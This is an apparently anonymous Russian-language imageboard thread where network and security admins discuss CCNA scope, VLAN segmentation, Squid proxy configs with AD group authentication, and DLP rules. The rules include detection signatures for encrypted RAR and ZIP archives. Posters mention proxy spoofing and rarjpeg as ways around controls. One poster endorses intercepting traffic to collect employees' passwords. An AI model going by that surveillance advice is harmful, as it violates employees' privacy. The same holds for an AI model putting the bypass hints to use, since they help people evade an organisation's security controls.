>На уровне CCNA лучше не лезь даже в MPLS и BGP. Всё равно до конца сейчас не разберешься, а где-нибудь на собеседовании какую-нибудь глупость возьмешь да и ляпнешь. Некоторые вещи лучше не знать вообще, чем знать плохо.
Согласен.
Для уровня ЦЦНА лучше усвоить хорошенечно OSPF и разные L2 технологии.
BGP, а уж тем более L2VPN не надо.
L2VPN это вообще узкая провайдерская тема.
Аноним 25/12/17 Пнд 14:51:06 #253 №1155917 
>>1155911
>BGP
БГП он же такой, типа не очень, получаешь себе циферку, анонсируешь сеть за собой. ну это актуально как минимум когда у тебя целый пул белых адресов.

Давай тогда так, на каком моменте заканчивается CCNA v3 R&S, так как я уже месяц как изучаю "от забора и до обеда"
А межсетевые экраны туда входят?
Сейчас спустя всякие наты, транки, спанинги дошёл до динамической маршрутизации, ещё надо всякие VRRP поизучать
Аноним 25/12/17 Пнд 14:56:30 #254 №1155923 
>>1155917
>Давай тогда так, на каком моменте заканчивается CCNA v3 R&S
Я не он, но скажу от себя.
Все эти "уровень CC" (вставить нужное) это довольно условное деление.
Тебе твой "уровень CCNA" для чего? Для прохождения собеседований или для сдачи сертификата?
По мне так уровень CCNA должен знать, что такое BGP, как его базово настроить. На этом всё.
Но опять же знать что такое и реально работать с какой-то технологией на крупной сети это разные вещи.

Аноним 25/12/17 Пнд 14:59:03 #255 №1155926 
>>1155923
>Но опять же знать что такое и реально работать с какой-то технологией на крупной сети это разные вещи.
Ясен хуй

А знание всяких там VRRP и прочих протоколов виртуализации оно на каком уровне? Вообще как часто используется, только в ядре и иногда в агрегации?
Аноним 25/12/17 Пнд 15:01:27 #256 №1155930 
>>1155926
>А знание всяких там VRRP и прочих протоколов виртуализации оно на каком уровне? Вообще как часто используется, только в ядре и иногда в агрегации?
VRRP — Агрегация/ядро.
Аноним 25/12/17 Пнд 15:09:45 #257 №1155934 
>>1155930
то есть для успешной работы и уровня ССНА мне достаточно уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки, назначать вланы в том числе и нативные, включать маршрутизацию на L3 коммутаторах, делать маршрутизацию на роутере, OSPF, ACL нууууу ииииии вроде всё

А не слишком ли мало? Как бы тут изучения на пару недель-месяц, учитывая, если знаешь OSI /TCPip
Аноним 25/12/17 Пнд 15:26:05 #258 №1155944 
>>1155934
CCNA - это на самом деле уровень первой линии техподдержки или инженера-монтажника сетевого оборудования в обязанности которого входит прописывание адресов на интерфейсах и т.п. ерунда, чтобы большие админы вообще не отрывали своих задниц в центральном офисе. Что именно входит в обязанности сильно зависит от профиля компании и от ее внутренних айти процессов.
Аноним 25/12/17 Пнд 15:39:57 #259 №1155949 
>>1155944
Так почему таким петухам ещё и платят по 100к? Как-то странно всё это.
Аноним 25/12/17 Пнд 15:52:27 #260 №1155962 
>>1155934
>то есть для успешной работы и уровня ССНА мне достаточно уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки, назначать вланы в том числе и нативные, включать маршрутизацию на L3 коммутаторах, делать маршрутизацию на роутере, OSPF, ACL нууууу ииииии вроде всё
Ну тут понимаешь ли как...это все равно, что написать что-то вроде:
"то есть для успешного ведения войны мне надо научится стрелять, читать карты, расставлять красные флажки в местах расположения армий, отдавать приказы по телефону...ну и врожде всё. А не мало? Всё это можно за неделю изучить.

Аноним 25/12/17 Пнд 15:53:47 #261 №1155963 
>>1155934
главное понимать как это всё работает в учловиях большой сети. И зачем. И видеть когда надо использовать то, а когда это. Это только с опытом приходит.
Аноним 25/12/17 Пнд 15:54:42 #262 №1155965 
>>1155949
>Так почему таким петухам ещё и платят по 100к? Как-то странно всё это.
Потому что работа сетевиком это не "уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки..."
Это инструмент всего-лишь.


Аноним 25/12/17 Пнд 16:17:33 #263 №1155972 
1385972970782513610.jpg
>>1155962
>>1155963
>>1155965
Ладно, вам не бомбите, чего бомбить-то
Аноним 25/12/17 Пнд 16:54:53 #264 №1155995 
14992549658890.jpg
>>1155965
>>1155963
>>1155962
Вот вы разошлись, вообще всю вашу работу довольно легко описать в паре страниц:
дели на вланы по отделам, если это влан для телефонов, то делай LACP (если ты ебанутый и купил цисок по 150$ за трубку, вместо фанвилов или елиноков по 50), если для видекамер, то запрещай в АЦЛ
Мути линки от доступа до агрегации через порт-ченнел
от агрегации до ядра по порт-ченнел+стп, ядро так вообще чисто СТП+ченнел, с вррп
всё это в стек рутереров, если один двинет коней, динамическую маршрутизацию внутри по OSPF, по BGP резервный провайдер, VPN на IPsec хотя он сосёт у openvpn а дальше крути-верти обмануть хоти
АЦЛ на запрет лишних портов не забудь повесить на рутер/фаерволл, а да, и всех пиздюков пользователей гони на прокси, а на АЦЛ шли нахуй весь трафик не с прокси

По оборудованию: на доступа ставим самое говно, где надо можно и не управляемое, или управляемое, типа HP 1910, ну или цисок 2960, на всякие там агрегации 3560, на ядерный можно их же, в виде NAT-a минимум 2911, ну для лохов конечно и/или филиалов, плюс пары VPN каналов, с эниконнектом, а на деле ASA, а ну и да, ДМЗ ещё не забудь нахуячить, только там реверс ещё нужен, но вы то реверс не настраивали, ладно, хуй с ним берём haproxy или squid, это можно и на L3 коммутаторе сделать отделив их от всей сети, в АЦЛ, а трафик из того влана deny нахуй, что бы обратно могли ходить только под себя

Короче, всё говно, что не моча
Аноним 25/12/17 Пнд 17:03:34 #265 №1156005 
>>1155995
Ты описал то чем занимается средний сотрудник интегратора.
Аноним 25/12/17 Пнд 17:05:52 #266 №1156007 
>>1156005
Знаю, знаю, на элиту я не могу замахиваться, просто про рядого пиздюка
Аноним 25/12/17 Пнд 17:49:17 #267 №1156044 
>>1155894
Тогда забей на все эти mpls/vpls. Нужны только у провайдера для предоставления услуг vpn.
Аноним 26/12/17 Втр 01:14:11 #268 №1156221 
>>1155667
>Зачем тебе вообще здесь две зоны оспф?
Затем, что на граничных маршрутизаторах настроены также туннельные интерфейсы DMVPN с n-ным количеством сетей удалённых площадок, у каждой своя зона. Кроме того не хочется, чтобы в магистраль анонсировалась информация о линках в каждую подсеть LAN ЦО, за исключением summary. А также не хочется, чтобы в тупиковые зоны анонсилась информация о служебных и туннельных линках.
>Разрулить ситуацию можно либо с помощью...
А вот за это спасибо.
>>1155310
Тебе тоже спасибо за наводку.
Аноним 26/12/17 Втр 01:14:44 #269 №1156222 
>>1155310 -> >>1155670
Промахнулся.
Аноним 26/12/17 Втр 01:16:25 #270 №1156223 
>>1155995
>дели на вланы по отделам
Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть.
Аноним 26/12/17 Втр 05:19:33 #271 №1156233 
>>1155310
Один раз жируху встречал, напаре с хикканом работала.
Аноним 26/12/17 Втр 07:27:04 #272 №1156249 
>>1156223
> >дели на вланы по отделам
> Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть.
У нас зачем то настояли безопасники на этом. Тоже не понятно зачем.
Аноним 26/12/17 Втр 08:12:08 #273 №1156260 
>>1155995
>Вот вы разошлись, вообще всю вашу работу довольно легко описать в паре страниц:
а чью работу нельзя описать в паре страниц?
Аноним 26/12/17 Втр 08:13:08 #274 №1156261 
>>1156005
>Ты описал то чем занимается средний сотрудник интегратора.
интегратора? он же вроде описал классического энтерпрайз-сетевика.
Аноним 26/12/17 Втр 08:14:18 #275 №1156262 
Какой то попадос аноны, но учу джаву будучи недоадмином, для мониторинга говна. Кто с jmx говном сталкивался?
Аноним 26/12/17 Втр 09:13:13 #276 №1156278 
>>1156223
>Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть.
>>1156249
>У нас зачем то настояли безопасники на этом. Тоже не понятно зачем.
Чтобы была возможность кого-то быстро пидорнуть при необходимости, продампать, проспуфить, найти откуда ноги растут. Чем больше широковещательных доменов, тем меньше широковещательных пакетов в сети, я бы вообще настаивал, что бы между подсетями закрыли все порты кроме используемых, ибо нехуй им иметь allow ip from any to any с 1 по 65535, выделил необходимое, остальное на прокси

На хабраче же есть вагон статей как спуфить трафик
https://habrahabr.ru/post/226679/

Я плохо помню всякие PCI DSS и ISO 27000, так как читал их сто лет назад, но вангую, что там тоже было деление

Вообще в огромных корп сетях деление, конечно, идёт по филиалам, допустим 10.10.56.0/22 с делением на 24 макси на ЦО, а всякие 172.16.100.0/16 с маской 24 на филиалы

Но, конечно, надо резать все пакеты в сети от DHCP, которые не DHCP и тому подобному

>>1156260
У Шивы! Поэтому я буду Шивой
Аноним 26/12/17 Втр 10:54:21 #277 №1156322 
>>1156278
>У Шивы! Поэтому я буду Шивой
Не, шива это обо всём и ни о чём. Знает всё по чуть-чуть. И стулья чинить, и чайники, и серваки админить, и мебель перетаскивать. Нахуй-нахуй
Аноним 26/12/17 Втр 12:07:56 #278 №1156350 
>>1156322
Почему, нормально, когда ты можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия, это очень странно, что многие упоротые специалисты не хотят выходить за рамки своего кругозора, мотивируя тем, что "ко-ко я лучше буду одно знать нормально, чем два, но плохо". Можно знать хорошо и две области.
А постоянно говорить, что это не по канону, просто отговорки.
У меня есть друг недотянувший 10 баллов на CCNP, когда я его спрашиваю на чём DNS и DHCP будешь делать он с твёрдой уверенностью говорит, что только на циске, вообще не понимая как работает авторизация в домене шиндоус, и для чего он нужен.
С другой стороны есть Я - ИБшник, обоссаный, сраный ИТ ИБшник, сукаблятьненавижуэтуработуброшуеёнахуй.
Так вот, сейчас есть интересная задача - реализовать выход одного приложения в сеть минуая ASA и PROXY, но так, что бы остальные приложения не ходили, приложение использует около 10к TCP и UDP портов и бешенного количество удалённых хостов с динамическими доменами 2-3-4 уровня, открытие на ASA которых приведёт к пидорству в сети уровня торрентов, и прочиего говна, которое людям не положено.
Как ИБшник я вообще нахуй шлю с такими программами, но есть запасное решение, ага, требующее знание двух областей, на случай если потребуется реализация от верховного главнокомандующего:
1. маркируем трафик конкретного приложения через ГПО, например, по TOS
2. Выпускаем на ASA по TOS-у

И таких примеров довольно много
Например задача: реализовать фильтрацию контента от плохих сайтов:
решение какое предложит любой вендор:
блюкот аса, цена внедрения, сколько там, в районе 20к долларов, или около того
Решение для "шарящего":
1. ставим SQUID + Rejik, режик не умеет в авторизацию в АД, но он охуенно лёгкий, горяздо легче сквид гварда, режим по базам режика доступ к ресурсам
2. выгружаем раз в 10-20 минут пользователей из группы кому-что можно, кому нельзя через Get-ADGroupMember "Terpili bez interneta" | Select SamAccountName > ACL.txt, подгружаешь в режик и смотришь
3. более секьюрный, но лень писать запрос, что пиздец как, через линух выгрузить пользователей домена и занести в файл, можно через тот же хелпер сквида

К чему я это, к тому, что ты должен разбираться до определённого уровня во всех областях, и только потом уходить в какую-то конкретную
Аноним 26/12/17 Втр 12:12:54 #279 №1156357 
>>1156350
Ну у сквида есть минусы, терпилы без интернета могут стать с интернетом
Аноним 26/12/17 Втр 12:13:39 #280 №1156358 
>>1156357
Ну давай, расскажи-ка мне как
Аноним 26/12/17 Втр 12:14:50 #281 №1156361 
>>1156350
>когда ты можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия
Серверную и сетевую инфру небольшого предпрятия и я могу.
Надо большого! С развитой сетью филиалов, СХД, виртуализацией и несколькими ДЦ.
Аноним 26/12/17 Втр 12:16:21 #282 №1156363 
>>1156350
>через линух выгрузить пользователей домена и занести в файл
Будем честны - лучше заплатить 20к зелени за готовое решение, чем так страдать. Олсо если у тебя в AD не 100-2000 учеток, а, скажем, в компании человек 30000+ даже мысли о подобных костылях уже выглядят смешно.

>ИБшник
ИМХО, безопасник - это такая белая шляпа, которая зарабатывает на баунти программах по поиску уязвимостей, а то чем ты занимаешься - обычная внутри корпоративная суета сует и томление духа. И беда вся в том, что ни предотвратить, ни отразить целенаправленную атаку на свою компанию, ты вряд-ли сможешь...
Аноним 26/12/17 Втр 12:18:17 #283 №1156367 
>>1156363
>баунти программах по поиску уязвимостей
это ещё что за херня?
Аноним 26/12/17 Втр 12:18:49 #284 №1156369 
>>1156361
>>1156350
>можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия
Только вот ни в одну составляющую инфры большого предприятия такой "специалист" уже не сможет и это печально, т.к. сильно ограничивает развитие и карьерный рост. Переходить к новой отрасли имеет смысл либо когда достиг предела в своей, либо если она находится где-то на стыке и ее освоение реально умножит твою ценностью, как специалиста.
Аноним 26/12/17 Втр 12:19:55 #285 №1156370 
>>1156367
Надеюсь, это не тот безопасник, что выше отписался, спрашивает?!
https://ru.wikipedia.org/wiki/Bug_Bounty
Аноним 26/12/17 Втр 12:20:26 #286 №1156371 
>>1156370
>Надеюсь, это не тот безопасник, что выше отписался, спрашивает?!
Не, я не он, я сетевик
Аноним 26/12/17 Втр 12:21:40 #287 №1156373 
>>1156358
Если кто-то имеет полный доступ у сквида или выше выданных тебя, можно просто подделать, по умолчанию люди делают что у 99% без ограничений идет у сервера прокси и просто подделываем запросы, прикидываемся что у нас ойпи как у сервера. По умолчанию, программ долбящих сквид вагон тот же проксифаер
Аноним 26/12/17 Втр 12:22:39 #288 №1156374 
>>1156370
прочитал что такое баг баунти.
ИМХО безопасник в российский реалиях это тот, кто пишет всякие бумажки и внедряет решения для того, чтобы закрыть жопу предприятия перед всмякими контролирующими органами.
В довесок к этому следит, чтобы сотрудники не спиздили базху данных клиентов.
Аноним 26/12/17 Втр 12:24:03 #289 №1156376 
>>1156374
>чтобы сотрудники не спиздили базху данных клиентов

Это как в привате? Извините, не удержался.
Аноним 26/12/17 Втр 12:25:51 #290 №1156379 
>>1156376
>Это как в привате? Извините, не удержался.
в каком ещё привате. Не понимаю тебя.
ПриватБанк что ли хохлятский имеешь ввиду?
Аноним 26/12/17 Втр 12:26:51 #291 №1156381 
>>1156371
Вообще эта тема весьма прибыльная, если ты реально шаришь в безопасности, а не просто хуй из отдела безопасности очередного средне-энтерпрайза. Регаешь на https://www.hackerone.com и получаешь по 100-300 баксов даже за весьма тривиальные уязвимости. Есть целые гайды для новичков: https://krober.biz/wp-content/uploads/2017/03/web-hacking-101.pdf - сам я не из этой области, но немного почитал эту книжку, т.к. сейчас небольшой сайт внутри компании задеплоил...

>>1156374
Ну от квалифицированного хакера ВНУТРИ компании (особенно внутри отдела IT или безопасников), увы, защититься нельзя. Спасает только одно - никто не пойдет на такой риск, т.к. вознаграждение в случае успеха недостаточно высоко по сравнению с наказанием в случае провала.
Аноним 26/12/17 Втр 12:27:23 #292 №1156382 
1с-ник и безопасник ссут в уши гендиру

У нас всё секурно!
@
vpn - скомпроментированный pptp
@
база 1с в которой все всё в первый день распечатывают список клиентов и получают пизды(если увидят)

Аноним 26/12/17 Втр 12:30:11 #293 №1156385 
>>1156379
https://ebanoe.it/2017/12/01/privatbank-hacked/
Аноним 26/12/17 Втр 12:36:00 #294 №1156391 
>>1156361
>Надо большого! С развитой сетью филиалов, СХД, виртуализацией и несколькими ДЦ.
Ты пишешь как буд-то это что-то страшное, и никогда не настраивал.
У меня был знакомый, который занимался виртуализацией, ещё в институте, такая пшука вообще, он рассказывал, о "гениальном решении", когда их серверу понадобилось больше 500гб ОЗУ, а денег не было, они сделали страйп из двух ССД и поместили на него ОЗУ той виртуалки, просто пушка, ну охуеть, выдумщик, а на деле даже адресацию в сетях не понимал, это всё херня, так же как и резервный ЦОД, впн уровня поинт ту поинт, скорее всего, почему-то я вангую, что 70% здесь сидящих сетевиков не расскажут о том как работает IPsec, а вопрос то прикладной в их области

>>1156363
>Будем честны - лучше заплатить 20к зелени за готовое решение, чем так страдать. Олсо если у тебя в AD не 100-2000 учеток, а, скажем, в компании человек 30000+ даже мысли о подобных костылях уже выглядят смешно.
Да, готовое решение всегда лучше, но с ограниченным бюджетом, бесплатное не сильно и хуже, разве, что ГУИ нет, и иногда ошибки на ССЛ бамп, от которого можно вообще отказаться и делать только пики степ1, если у тебя нету ДЛП
Костыль - решение для режика, так как он не умеет в АД, а на сам сквид нету блеклистов, точнее есть, но оно совсем не подходит под наш регион, плюс сквид, если ты не знаешь, с версии, кажется 3.4 перестал понимать такие ACL, где содержится домен первого и домен второго уровня, он выдаёт ошибку, типа или блокируй первого уровня или второго, а два сразу нельзя. Из-за этого используют редиректоры.
Сам squid умеет авторизоваться в АД, как я и написал, можно через хелпер сквида брать пользователей для редиректора
>ИМХО, безопасник - это такая белая шляпа, которая зарабатывает на баунти программах по поиску уязвимостей, а то чем ты занимаешься - обычная внутри корпоративная суета сует и томление духа. И беда вся в том, что ни предотвратить, ни отразить целенаправленную атаку на свою компанию, ты вряд-ли сможешь...
Это не верное представление, безопасник - обратное от хацкера, ты должен уметь хацкать, что бы предотвратить, ну я про ИТ безопасника, но моя работа говно, и я уволюсь

Кстати, я ИБшник в конторе с 10к пользователями и 6к рабочими станциями, я тебе больше скажу, несмотря на размеры, мы не ГОС, денег на ИТ выделяется крайне мало, поэтому и рождаются такие костыли

Кстати, в своё время был админом в одном из банков, так и там была связка блюкота с сквидом, ага, ага, из экономии, мань

>>1156369
Суть в том, что бы в крупной конторе уметь давать рекомендации. Если подрядчик наделал хуйню, а ты не компетентен это проверить, то это - твоя проблема
Не надо быть админом всего, надо уметь это делать, и понимать где кто-то может обосраться. И это важно ещё для того, что бы другие отделы или подрядчики тебе не вешали лапшу на уши по поводу сложности задачи
Живой пример: подрядчик предлагает сделать шифрование каналов между нодами готового решения, цена вопроса 200к, решение - 3 команды из openssl, которые он мог бы ввести сам за 200к, или, которые ввёл я, сэкономив деньги компании, получив приятный бонус в конце квартала



Вопросы?

Аноним 26/12/17 Втр 12:38:53 #295 №1156392 
>>1156382
БЕЗОПАСНИК УХОДИТ ПИТЬ ЧАЙ
@
СЕТЕВИКИ ВКЛЮЧАЮТ НА ФАЕРВОЛЛЕ ПРАВИЛО ALLOW ANY TO ANY
@
ВИНДУЗЯТНИКИ ДОБАВЛЯЮТ ВСЕХ В ДОМЕННОГО АДМИНА
@
ЛИНУКСОЙДЫ ВКЛЮЧАЮТ АВТОРИЗАЦИЮ ОТ ROOT С ПАРОЛЕМ ROOT
@
ЭНИКЕИ УДАЛЯЮТ АНТИВИРУСЫ
@
БУХГАЛТЕРА НАМАТЫВАЮТСЯ НА АМИГО
@
МЕНЕДЖЕРЫ СКАЧИВАЮТ ДЕТСКОЕПОРНО.EXE
@
СЕКРЕТАРИ ЗАСОВЫВАЮТ ФЛЕШКИ ВСЕХ ПРИХОДЯЩИХ ЛЮДЕЙ В КОМПУХТЕР
@
ПАРОЛЬ ОТ SQL ТЕПЕРЬ "*"
Аноним 26/12/17 Втр 12:47:15 #296 №1156400 
>>1156391
>ты должен уметь хацкать
Я таких безопасников еще нигде не встречал. Что логично, ведь если ты рили можешь хакать, то на копеечном окладе в черте-какой компании сидеть не будешь.

>squid умеет авторизоваться в АД
Ну мы так сейчас доебемся до того, чтобы сами весь нужным нам функционал на пайтоне написать с нуля. То же взаимодействие с AD я, например, уже делал неоднократно, правда это было на java, но суть та же. Кто вот только потом сможет такие решения поддерживать, после увольнения изобретательного админа?
Аноним 26/12/17 Втр 12:54:15 #297 №1156405 
>>1156400
Давайти проведем черту, АД это не единая технология и взаимодействие ты проводил через керберос?
Аноним 26/12/17 Втр 12:56:48 #298 №1156406 
>>1156405
При чем тут керберос то? Задача вроде была получить пользователей, а заодно еще и привязку имени пользователя к имени компа и IP. Иначе нахуй вообще с AD взаимодействовать?
Аноним 26/12/17 Втр 12:58:43 #299 №1156409 
>>1156406
>То же взаимодействие с AD я, например, уже делал неоднократно,
Аноним 26/12/17 Втр 13:00:26 #300 №1156410 
>>1156409
Через openldap интерфейс.
Аноним 26/12/17 Втр 13:01:07 #301 №1156411 
>>1156400
>Я таких безопасников еще нигде не встречал. Что логично, ведь если ты рили можешь хакать, то на копеечном окладе в черте-какой компании сидеть не будешь.
У меня не копеечный оклад, и я не в хуле какой, а известной по всей РФ конторе, просто работа говно, мне нужна или абсолютная власть или веселье, а тут я 90% времени ебалом в длп, хуйня полная
Ну надо понимать, что 100% защиты от атак не бывает, например, когда 2 года назад нашли уязвимость в цисках, ей воспользовались злоумышленники, и хацкнули один банк, где работал мой друг, с выводом средств, и это была вина ЦИСКО, поскольку у банка был пройден PCI DSS, и соблюдены все меры
Равно как и нельзя защититься от спуфинга в подсетях, так как хацкер может прийти и засунуть устройство в патчкорд между ПК и сетевухой, ну варианты

У сквида есть хелперы, зачем что-то писать на питоне, они есть из коробки

auth_param negotiate program /usr/lib/squid3/negotiate_wrapper_auth --ntlm /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp --kerberos /usr/lib/squid3/negotiate_kerberos_auth -s HTTP/[email protected]

Просто авторизуй линуксовый сервак через самбу и крб в домен, получи тикет и делай дальше запросы

или вот:
external_acl_type memberof ttl=3600 ipv4 %LOGIN /usr/lib/squid3/ext_ldap_group_acl -v 3 -P -R -K -b "dc=company,dc=local" -D [email protected] -W /etc/squid/PASSWORDS/conf_param_ldappass.txt -f "(&(objectclass=person)(sAMAccountName=%v)(memberOf:1.2.840.113556.1.4.1941:=cn=%g,OU=SQUID,OU=SECURITY,DC=int,DC=rolfcorp,DC=ru))" -h dc-01.company.local company.local

Это запрос смотретьна группы с подгруппами, можно и бейсик запрос, но в явном виде - не безопасно

И саму группу авторизуешь как acl в сквиде:

acl InternetFull external memberof InternetFull
Аноним 26/12/17 Втр 13:04:32 #302 №1156412 
>>1156406
нет,

>>1156405 - это другой анон, но он прав, про керберос

squid - умеет работать с AD, умеет авторизоваться, умеет смотреть пользователей, и работать с группами и подгруппами, конфиг для примера выше

rejik или squidGuard - доп софт, который ставится в связке с сквидом, он НЕ умеет работать с АД

Если ты ограничиваешь трафик по написанным или найденным тобой блек-листам через сквид, то проблем нету

Если ты для удобства берёшь готовые блек листы с миллионами сайтов по категориям, например шелладб http://www.shallalist.de/ , то это говно с сквидом без сквидГварда не работает
Отсюда и появляются такие костыли

Если у тебя стоят правила, уровня: можно только 5-50 сайтов, остальное нельзя или фулл, тогда обычный сквид без надстроек и всё, этого более чем
Аноним 26/12/17 Втр 13:06:48 #303 №1156415 
>>1156412
ОК, понял. Просто у нас была TMG, а сейчас перешли на PaloAlto... Сквид вообще в глаза не видел.
Аноним 26/12/17 Втр 13:23:42 #304 №1156431 
>>1156415
>Сквид вообще в глаза не видел.
ну пиздец блять, ну пиздец, ну сука, ну пиздец, вот с этого я прямо подгорел, ну ты и блять пиздец
> ругает
> не пробовал
ну блять, ну и нахуй

У TMG нету ICAP, у нас актуально для DLP в разрезе наличие ICAP

И вообще зря, сквид очень крут, ты думаешь, почему в 90% случаев или бесплатный сквид или платный блюкот, потому, что остальное - мусор
Плюс у сквида просто божественное масштабирование, в буквальном смысле скопировал машину с сквидом - вторая прокси, ещё раз - третья, и всё, только переименуй и готово

А, ну и последнее, я тебе рассказал только про сквидГвард, а у сквида сотни плагинов и доп фич, анализатор логов - кто куда ходил, пожалуйста - sarg/lightsquid, посмотреть активные соединения - sqstat
Хочешь - делай в коннект, хочешь в транспарент, хочешь задавай формат логов, хочешь исключай из логов, балансируй трафик, делай реверс, фильтруй по контенту (музыка, фото, видео), работа с регулярными выражениями
Короче, сквид в буквальном смысле умеет всё, только имеет проблему с плохо подписанными сайтами, так как базируется на сертификатах мозиллы
Аноним 26/12/17 Втр 13:42:37 #305 №1156530 
>>1156431
>вот с этого я прямо подгорел
Ну так я совсем и не безопасник, лол.

>DLP ICAP
Как одно с другим вообще связано? Никакой DLP не помешает подключить жесткий диск рабочего компа к мобильному телефону через sata-usb переходник и внешний источник питания. Или вы шифруете диски всех пользователей? А ICAP - это, вроде, совсем из другой оперы, про перенаправление проксируемого трафика для проверки на вирусы.
Аноним 26/12/17 Втр 13:48:02 #306 №1156556 
>>1156431
Замену TMG уже нашел?
Аноним 26/12/17 Втр 13:49:59 #307 №1156563 
>>1156530
Ты не работал с DLP

DLP, например симантек, на котором я сижу, имеет модули: эндпоинт (ставится на конечные точки, встраивается в браузеры, в драйвера USB и всего всего) Network (отправляют трафик с прокси сервера на проверку, да, да ССЛ, про сслбумп я тебе писать не буду гугли сам), модуль распознования картинок (забыл название, но как-то так) и модуль сетевых шар, который маркирует все файлы на шарах

Вот эндпоинт ставится, как я писал выше в разрез всего I/O твоей системы, от флешек, до клавиатуры и принтеров
Единственный вариант - фоткать монитор

Сириусл, а политики опознавания телефонов задаются регулярными выражениями. Пример:


((\+?\s?[7])|8\s?)?[-\ ]?[(]?(([9][01235689][0-9]|(49[5689])|(8[18][123])|800))[)]?[-\ ]?\d{3}[-\ ]?\d{2}[-\ ]?\d{2}

слушай, поговорил с тобой, и таки думаю, что надо бы мне работу менять, вроде не очень-то я и тупой, а то постоянно кажется что знаний на нормальное место не хватит :((((
Аноним 26/12/17 Втр 14:09:55 #308 №1156580 
>>1156556
А чем PaloAlto не замена? NGFW как-никак, плюс по подписке базы для фильтрации плохих сайтов, сетевых сервисов и проверки трафика на вирусную, ну и своя собственная песочница в придачу. Всё было бы совсем хорошо, если бы это дело настраивали не наши безопасники, а знающие люди, лол.

>>1156563
>SSL BUMP
Ну пальто тоже это умеет, разумеется, если есть возможность подменить пользовательский сертификат всем сотрудникам (нельзя, потому что у топчиков личные маки / айфоны, которые должны работать в корпоративной беспроводной среде на всех площадках).

>DLP
У обычных пользаков семерка с секретнетом - вот и всё DLP. Про то, что проверки секретнет отключаются локально при наличии локальных админских прав, ты и так знаешь, равно как и что получение этих прав предотвратить невозможно при физическом доступе к компу. А про то, что у этих пользаков нет никакой чувствительной инфы (в отличие от топчиков) я молчу.

>фоткать монитор
Ну это если данные вообще не сохраняются локально на компе, а если сохраняются - выкручивай его, да копируй до посинения.

Интересно, кстати, как почтовый сервер у вас обрабатывает вложения с зашифрованными архивами и всякие rarjpeg-и... У нас - никак, на днях коллеге ps1 скрипт в шифрованном zip-е успешно отправил... Да чего там, можно было даже письма без авторизации отправлять(!) пока я не заметил и не рассказал. Мне не верили, пока не прислал письмо с чужой корпоративной почты. Такие вот реалии безопасности. И я рад, что не отвечаю за нее никаким образом.

У тебя синдром самозванца - ты явно разбираешься в своей области, не бойся нихуя и ищи работу себе по душе.
Аноним 26/12/17 Втр 14:25:43 #309 №1156588 
>>1156580
>У тебя синдром самозванца - ты явно разбираешься в своей области, не бойся нихуя и ищи работу себе по душе.
Наверное ты прав, у меня просто есть пару друзей нинздей, рядом с которыми я кажусь обычным эникеем

Вообще под вафлю надо бы выделить в этом случае отдельную подсеть, и отделить от бампинга, у наших топов вообще почти нет отношения к корп сети, только выделенные сервера в европе с функцией физического уничтожения, хотя кто их проверит. Вообще вайфай устройства в корп сети - моветон, в крайнем случае WPA2 через радиус, и то всё равно лучше нахуй
Бампать трафик ещё полезно для логинов/паролей, что бы собирать инфу по своим сотрудникам, в случае каких-то проблем, проверить кто что ворует, откаты и тп

По поводу ДЛП, можно, да, вытащить хард и открыть на другом ПК, 100% защиты нету при любом раскладе

У нас крупная сеть с миллионами клиентов, самое главное у нас персональные данные клиентов, как оператор ПерсДан согласно фз152, у нас воровство клиентов с стороны сотрудников, отсюда и есть политики на запрет копирования телефонов, шифрованных архивов, и тп
Мы лочим копирование шифрованных архивов через саму ДЛП, там есть утилита, которая делает аля слепок типа файла, и дальше, его можно переименовывать, изменять, но слепок будет один на все. Например теги винрара, взятые с оф сайта, хотя такие теги можно и самому написать, просто сняв слепок с программы:

$First4rarTag=getHexStringValue('52617221'); $First4rarBytes=getBinaryValueAt($data, 0x0, 4); assertTrue($First4rarTag == $First4rarBytes); $Second3rarTag=getHexStringValue('1A0700'); $Second3rarBytes=getBinaryValueAt($data, 0x4, 3); assertTrue($Second3rarTag == $Second3rarBytes); $EncryptedrarTag=getHexStringValue('80'); $EncryptedrarBytes=getBinaryValueAt($data, 0xA, 1); $FileHeaderFlags = getBinaryValueAt($data, 0x18, 1); $modedValue = mod($FileHeaderFlags, 8); if ($modedValue >=4) { assertTrue($modedValue >= 4); } else { assertTrue($EncryptedrarBytes == $EncryptedrarTag); }

А вот винзип
$Int1 = getHexStringValue('377ABCAF271C0004'); $Int2 = getBinaryValueAt($data, 0x0, 8); assertTrue($Int1 == $Int2);

Почтовый сервер ходит через тот же сквид с бампом, сертификат корпоративный, купленный в комодо, поэтому трафик нашей почты мы можем открыть и подписать, доступ к ОВЕ есть, остальные доступы, типа активсинка нету, для подключения из дома ВПН с РДП, РДП следит и мониторит ДЛП
Аноним 26/12/17 Втр 14:41:38 #310 №1156598 
>>1156588
>для логинов/паролей
Вот это уже опасное дело. Т.к. если что-то пойдет не так, то пользователь сможет засудить компанию за вмешательство в частную жизнь. И, насколько знаю, даже если у сотрудников в трудовом договоре прописано, что нельзя использовать рабочий инет в личных нуждах - это не дает права снифать пароли/инфу пользаков, которая не относится к их непосредственным рабочим обязанностям. При том попасть можно очень больно - у нас как-то дедка уволили незаконно, а у он оказался корешем одного крупного политика и блядь такие проверки на компанию натравил, что с ним еле договорились потом...

Про rarjpeg ты так и не ответил, кстати...

>Наверное ты прав, у меня просто есть пару друзей нинздей, рядом с которыми я кажусь обычным эникеем
Ну так это ж наоборот хорошо - есть у кого учиться. Сам тоже собираюсь уходить, но как раз в т.ч. и потому что рядом ниндзей нет.
Аноним 26/12/17 Втр 14:53:04 #311 №1156608 
>>1156598
>Про rarjpeg ты так и не ответил, кстати...
Я не пробовал с ним, это интересный вопрос, можно протестить, у тебя нету под ругой раржепега, так как делать его сейчас самому, ну пиздец как лень

